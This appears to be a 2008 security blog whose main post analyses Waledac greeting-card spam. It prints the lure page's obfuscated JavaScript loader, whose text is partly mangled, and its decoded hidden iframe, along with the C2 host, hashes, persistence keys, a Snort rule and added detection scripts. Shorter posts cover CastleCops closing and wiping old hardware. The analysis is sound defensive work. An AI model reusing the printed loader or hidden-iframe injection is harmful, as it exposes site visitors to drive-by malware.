Wednesday, December 31, 2008

Fast Flux Greeting Card Spam

Over the last several days my mail drops have been receiving a number of New Year and Christmas greeting-card spam messages. They all appear to come from the same group:
Thomas just mailed to you a Christmas Postcard. Your card will be available at:
http://
newyearcardonline. com/?cardnum=e830b6884376991e6a6960068c0a
Blessings to you from the ecards-gallery.com
(spaces added to protect from accidental clicks)

When you visit the site, you are greeted with a JPEG image that is itself a link; clicking anywhere on it prompts you to download postcard.exe (or ecard.exe).


(snapshot taken on 12/30/2008 by DISOG)

The domains used by this group include:

The fast flux domains are registered through paycenter.com.cn, out of China; Whois information on those domains is posted here. Paycenter.com.cn is known to host several phishing-related domains as well.

The site includes a one-line piece of JavaScript:
var kMIkfQBFc6XycsDCpstUGgN2IlVDNTr=Array(63,20,3,46,23,58,41,45,44,0,0,0,0,0,0,0,21,14,
22,25,40,47,34,7,15,4,10,42,55,30,48,49,28,29,5,27,51,8,2,19,53,1,59,0,0,0,0,9,0,37,6,32,50,16,57,
36,12,61,62,39,35,13,31,18,52,60,33,54,26,24,43,38,17,11,56),FDThSyHWyj0O6kV=
"CdqN4Whd94DX4ShwGsPpx4ikJKDX9vqNJEqFy2PpJJ8d_G8FbkhTbZqF@EPXtVqO@
sqrRtQpPkhNuMuNhSQX_WhLn38dy2qrSw6FhHqXIlhNSV",C7Et1fOaTBFVqCmFAMyas8KCrCdo48iEUDJ
=0,XSyj5GuMgbyK7p=0,mIFBLKV3Me0q4pIPy3U2w=0,idxbfk_aWcRW7,opFx77WKnhL60Qr83=
FDThSyHWyj0O6kV.length,jQTi=1024; window.status=' '; for(var eMURVlsMortMi3PphMd=Math.ceil(opFx77WKnhL60Qr83/jQTi);eMURVlsMortMi3PphMd>0;eMURVlsMortMi3PphMd--){idxbfk_aWcRW7='';
for(var BLgQQyHi=Math.min(opFx77WKnhL60Qr83,jQTi);BLgQQyHi>0;BLgQQyHi--,opFx77WKnhL60Qr83--){C7Et1fOaTBFVqCmFAMyas8KCrCdo48iEUDJ|=(kMIkfQBFc6XycsDCpstUGgN2IlVDNTr[FDThSyHWyj0O6kV.charCodeAt(mIFBLKV3Me0q4pIPy3U2w++)-48])<>=8;XSyj5GuMgbyK7p-=2} else XSyj5GuMgbyK7p=6}document.write(idxbfk_aWcRW7);}

When decoded, it writes:
<iframe src="http:// seofon. net/gold /click.pnp?eb0h" style="display:none"></iframe>
At this time, that site returns a "Forbidden" page.
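
The decoded payload is a hidden iframe, which is the thing to look for when checking whether a page has been injected. The following Python is an added example (not the post's code): it scans HTML with the standard-library parser and reports iframes hidden by CSS and, going a little beyond the post, ones shrunk to a pixel. The sample HTML is constructed, with the iframe host de-fanged by spaces as the post prints it.

```python
from html.parser import HTMLParser
import re

# Constructed sample page: the hidden iframe is the one the decoded script
# writes (host de-fanged with spaces, as printed in the post), plus a
# visible frame and a 1x1 frame for contrast.
SAMPLE_HTML = """<html><body>
<img src="card.jpg" alt="Your postcard">
<iframe src="http:// seofon. net/gold /click.pnp?eb0h" style="display:none"></iframe>
<iframe src="https://example.invalid/visible" width="600" height="400"></iframe>
<iframe src="https://example.invalid/tiny" width="1" height="1"></iframe>
</body></html>"""

_HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _is_tiny(value):
    """True when a width/height attribute is 0 or 1 pixel."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


class HiddenIframeFinder(HTMLParser):
    """Collects (src, reason) for every iframe a user would not see."""

    def __init__(self):
        super().__init__()
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # html.parser lowercases tag names
            return
        a = dict(attrs)
        if _HIDDEN_CSS.search(a.get("style") or ""):
            self.hidden.append((a.get("src", ""), "css-hidden"))
        elif _is_tiny(a.get("width")) and _is_tiny(a.get("height")):
            self.hidden.append((a.get("src", ""), "tiny"))


def find_hidden_iframes(html):
    """Parse `html` and return the list of hidden iframes as (src, reason)."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.hidden


if __name__ == "__main__":
    for src, reason in find_hidden_iframes(SAMPLE_HTML):
        print(f"{reason:10s} {src}")
```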

The binary, postcard.exe, has an MD5 hash of 31a8756b48576862e6312bdc063fa94b. It is packed with UPX; when unpacked, it has an MD5 hash of 9f70846b6461cb881228bced7918f991.

VirusTotal reports that only 16 vendors detect this trojan:
File postcard.exe received on 12.31.2008 15:23:46 (CET)
Antivirus | Version | Last Update | Result
a-squared | - | - | -
AhnLab-V3 | - | - | -
AntiVir | - | - | TR/Proxy.Gen
Authentium | - | - | W32/Downloader.F.gen!Eldorado
Avast | - | - | -
AVG | - | - | Downloader.Generic_r.CL
BitDefender | - | - | -
CAT-QuickHeal | - | - | -
ClamAV | - | - | -
Comodo | - | - | -
DrWeb | - | - | Trojan.DownLoad.26732
eSafe | - | - | Suspicious File
eTrust-Vet | - | - | -
Ewido | - | - | -
F-Prot | - | - | W32/Downloader.F.gen!Eldorado
F-Secure | - | - | Suspicious:W32/Malware!Gemini
Fortinet | - | - | suspicious
GData | - | - | -
Ikarus | - | - | Trojan.Win32.Waledac
K7AntiVirus | - | - | -
Kaspersky | - | - | -
McAfee | - | - | -
McAfee+Artemis | - | - | Generic!Artemis
Microsoft | - | - | Trojan:Win32/Waledac.A
NOD32 | - | - | a variant of Win32/Waledac
Norman | - | - | -
Panda | - | - | Suspicious file
PCTools | - | - | -
Prevx1 | - | - | -
Rising | - | - | -
SecureWeb-Gateway | - | - | Trojan.Proxy.Gen
Sophos | - | - | Sus/Spy-B
Sunbelt | - | - | -
Symantec | - | - | W32.Waledac
TheHacker | - | - | -
TrendMicro | - | - | -
VBA32 | - | - | -
ViRobot | - | - | -
VirusBuster | - | - | -

Additional information
MD5: 31a8756b48576862e6312bdc063fa94b
SHA1: b463b6d251a26a86a1f1472d6dbc0d953f4b4d5c
SHA256: 9fd8ae4b3bf5dcc239a3ea97e113683d1eb3ce564987109ccbeb2b2565c47d15
SHA512: f436e13c9b6886b5ea5367d906d10f3f6ad596b969f205f7ceab5bcc9a1f6044e5a08a2c74ab6e09071c86f8c8fc9fcb661920e34f0208fae663ad44f9a813d6

The binary contains a self-signed certificate:
Its subject is /C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd. The binary posts encrypted data to http:// mirabellaclub.com/ with the Referer header set to the bare string "Mozilla", which is highly unusual and can serve as a Snort signature to identify infected hosts:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"2009 Holiday Greeting Spam - Unusual Referer String (Mozilla)"; flow:to_server,established; content:"Referer|3A| Mozilla|0D 0A|"; nocase; classtype:trojan-activity; sid:999999; rev:1;)
(The colon is written as the hex byte |3A| so it needs no escaping, and the trailing |0D 0A| anchors the match to a Referer whose entire value is "Mozilla" rather than one that merely begins with it.)
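
The same check as an added Python example (not the post's own code), for running over captured requests offline, such as headers pulled from a proxy log or a pcap: it parses each request and flags any Referer that is not a URI at all, which generalises the rule's literal "Mozilla" match. The sample requests are constructed; the host names are the post's, de-fanged with a space, or reserved example names.

```python
from urllib.parse import urlsplit

# Constructed sample requests, CRLF-delimited as on the wire. Only the
# first and last carry the bare-token Referer the post describes.
SAMPLE_REQUESTS = [
    "POST / HTTP/1.1\r\nHost: mirabellaclub. com\r\nReferer: Mozilla\r\n"
    "Content-Type: application/octet-stream\r\nContent-Length: 64\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.invalid\r\n"
    "Referer: http://www.example.invalid/\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /a.gif HTTP/1.1\r\nHost: www.example.invalid\r\n\r\n",
    "POST /upload HTTP/1.1\r\nHost: www.example.invalid\r\nREFERER: mozilla\r\n\r\n",
]


def parse_headers(raw):
    """Return (request line, {lowercased header name: value}) for one request."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def referer_is_malformed(value):
    """A real Referer is an absolute URI (scheme://host/...) or a relative
    reference starting with '/'; a bare token such as "Mozilla" is neither."""
    if value is None:
        return False                 # no Referer at all is normal
    parts = urlsplit(value)
    if parts.scheme and parts.netloc:
        return False
    return not value.startswith("/")


def find_suspicious(requests):
    """Return [(request line, host, referer)] for each request whose Referer
    is malformed; these are the client/host pairs to pull for triage."""
    hits = []
    for raw in requests:
        req_line, headers = parse_headers(raw)
        ref = headers.get("referer")
        if referer_is_malformed(ref):
            hits.append((req_line, headers.get("host", ""), ref))
    return hits


if __name__ == "__main__":
    for req_line, host, ref in find_suspicious(SAMPLE_REQUESTS):
        print(f"{req_line!r} host={host!r} referer={ref!r}")
```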
The binary creates a registry key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PromoReg" which is used to launch the binary from the saved location (in my case, I placed it on the desktop).

This file does not install into the system directories, yet it still restarts automatically on reboot. This means that even users who run with standard user privileges can become infected and join the botnet. If the binary is run as a normal user, the registry key is placed under "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PromoReg" instead.

I started mapping the fast flux IPs and came up with about 150 unique IP addresses; the list is available here.
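
Mapping the flux network means resolving the domains repeatedly and comparing answers. The following is an added Python example (not the post's own code) that summarises such resolution snapshots: unique IPs per domain, how much the answer set churns between lookups, and which IPs answer for more than one of the group's domains. The snapshots are constructed from RFC 5737 documentation addresses; the domain names are the ones the post mentions plus a reserved example name for contrast.

```python
from collections import defaultdict

# Constructed resolution snapshots: (domain, TTL seconds, A records returned),
# using RFC 5737 documentation addresses; the domain names are the post's.
SNAPSHOTS = [
    ("newyearcardonline.com", 300, ["192.0.2.10", "192.0.2.11", "198.51.100.5"]),
    ("newyearcardonline.com", 300, ["198.51.100.5", "203.0.113.7", "192.0.2.12"]),
    ("newyearcardonline.com", 300, ["203.0.113.8", "192.0.2.13", "198.51.100.6"]),
    ("mirabellaclub.com", 300, ["192.0.2.11", "203.0.113.7", "198.51.100.9"]),
    ("mirabellaclub.com", 300, ["192.0.2.13", "203.0.113.9", "198.51.100.5"]),
    ("www.example.invalid", 86400, ["192.0.2.200", "192.0.2.201"]),
    ("www.example.invalid", 86400, ["192.0.2.200", "192.0.2.201"]),
]


def jaccard(a, b):
    """Overlap between two answer sets, 0.0 (disjoint) to 1.0 (identical)."""
    a, b = set(a), set(b)
    return len(a & b) / len(a | b) if a | b else 1.0


def summarise(snapshots, low_ttl=600, max_overlap=0.5):
    """Per domain: unique IPs seen, lowest TTL, mean overlap between
    consecutive answers, and a flux flag (short TTL and answers that
    mostly change from one lookup to the next)."""
    per_domain = defaultdict(list)
    for domain, ttl, ips in snapshots:
        per_domain[domain].append((ttl, ips))
    out = {}
    for domain, rows in per_domain.items():
        unique, overlaps = set(), []
        for i, (ttl, ips) in enumerate(rows):
            unique.update(ips)
            if i:
                overlaps.append(jaccard(rows[i - 1][1], ips))
        mean = sum(overlaps) / len(overlaps) if overlaps else 1.0
        ttl = min(t for t, _ in rows)
        out[domain] = {"unique": len(unique), "ttl": ttl,
                       "mean_overlap": round(mean, 3),
                       "flux": ttl <= low_ttl and mean < max_overlap}
    return out


def shared_infrastructure(snapshots):
    """IPs that answered for more than one domain: evidence that the group's
    domains sit on one flux network rather than on separate hosting."""
    ip_to_domains = defaultdict(set)
    for domain, _, ips in snapshots:
        for ip in ips:
            ip_to_domains[ip].add(domain)
    return {ip: sorted(d) for ip, d in ip_to_domains.items() if len(d) > 1}
```

With real data the snapshots would come from periodic lookups spaced at least one TTL apart; the thresholds are starting points, not fixed cut-offs.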

Update 1: More information is available here:

http://www.symantec.com/norton/security_response/writeup.jsp?docid=2008-122308-1429-99&tabid=2
and here: http://isc.sans.org/diary.html?storyid=5557
and here: http://asert.arbornetworks.com/2008/12/another-holiday-another-e-card-run-waledec/

Update 2: Shadowserver has posted a great write up here:

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231


Thursday, December 25, 2008

CastleCops has gone offline

I was pointed to the CastleCops website today, where I found this message:

Greetings Folks,

You have arrived at the CastleCops website, which is currently offline. It has been our pleasure to investigate online crime and volunteer with our virtual family to assist with your computer needs and make the Internet a safer place. Unfortunately, all things come to an end. Keep up the good fight folks, for the spirit of this community lies within each of us. We are empowered to improve the safety and security of the Internet in our own way. Let us feel blessed for the impact we made and the relationships created.

With respect to the server marathon, by March 17 2009 CastleCops will refund contributions made through PayPal that were specifically designated for servers. Unfortunately, server donations made via check cannot be returned because we do not have the addresses for the donating entity. Unless instructed otherwise, CastleCops will re-allocate these funds as a donation to the Internet Systems Consortium (ISC.org). This organization sponsored our hosting environment for approximately the past 2 years. Please contact us [cc at laudanski dot com] before March 17, 2009, if you would like a return of your server marathon donation. Otherwise, we would like to thank the ISC for their unfettered support.

We thank everyone in creating our unique footprint and memories in time.

Love, Best Wishes and Happy Holidays, CastleCops
PST 23 Dec 2008

The CastleCops Phishing Incident Response Team and Malware Incident Response Team have been very useful resources. This group will be missed. Best of luck to their team.


Christmas Hardware

Season's greetings, everyone. I'm sure that more than a few of you will be receiving new hardware this time of year.

I was strolling through Sears to buy that gift for my wife, and noticed that 4 GB PNY USB thumb drives were about 15 dollars. Computers are cheaper, and nearly every 10-year-old child has a smart phone. Many children will be unwrapping new game consoles, parents and grandparents will get picture frames - nearly everyone I know is expecting some sort of computer-related hardware.

The Internet Storm Center has released its yearly word of caution, and I concur with its statements.

With that said, I'd like to focus on properly disposing of your old gear.

Many of us keep our pictures, password files (you do use Password Safe, right?), financial spreadsheets, résumés, and other confidential data on our computers. Even if you don't store such data, you may have residual emails, cookies, images, and other sensitive documents on those old digital devices.

I'd like everyone to commit to securely wiping all of their old hard drives, USB thumb drives, smart phones, PDAs and flash cards, and to shredding old, unneeded backup CDs. It takes a little time, but could save a lot of hassle or embarrassment in the future. Many wiping solutions are free, so there is no excuse not to use them.

For Windows users, Eraser will securely remove single files and directories and clear slack space.
For Linux users, use Wipe.
For old hard drives, a triple-pass wipe with DBAN (Darik's Boot and Nuke) should defeat any casual recovery software.
CDs should be shredded using a device approved for shredding CDs and DVDs; cheap shredders are generally $25-$30.

Once wiped, consider donating used computer equipment to a worthwhile charity. I saw a program on Street Teens the other night in which donated computers were used to help teens find work; can you even get a job without applying online anymore?

Nursing and retirement homes are always in need of second hand digital gear, including MP3 players and picture frames!

Enjoy a happy Christmas!
